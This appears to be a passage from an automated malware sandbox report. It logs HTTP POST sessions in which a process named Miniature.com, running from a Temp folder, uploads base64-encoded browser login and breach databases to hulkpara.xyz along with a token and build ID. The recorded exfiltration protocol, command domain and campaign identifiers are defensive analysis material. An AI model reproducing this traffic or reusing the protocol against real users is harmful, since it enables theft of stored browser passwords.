                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:56 GMT
                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                          CF-RAY: 8f4597c8da357295-EWR
                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0e 10 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 01 2c 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 32 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 36 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f1 00 0c 00 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA&prod-atm-wds-edgetrafficmanagernetA,)prod-agic-eu2-2eastus2cloudappazure,<0ns1-06azure-dns,msnhst"',:<)


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          24192.168.2.74978994.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----7G4EUKFKXLNYU3WL6PZU
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 68733
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 47 34 45 55 4b 46 4b 58 4c 4e 59 55 33 57 4c 36 50 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 45 55 4b 46 4b 58 4c 4e 59 55 33 57 4c 36 50 5a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 47 34 45 55 4b 46 4b 58 4c 4e 59 55 33 57 4c 36 50 5a 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------7G4EUKFKXLNYU3WL6PZUContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------7G4EUKFKXLNYU3WL6PZUContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7G4EUKFKXLNYU3WL6PZUCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:56 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                          Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:58 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          25192.168.2.74980794.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----F3E37GL6XLN7YU3OPP89
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 262605
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------F3E37GL6XLN7YU3OPP89Cont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:58 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
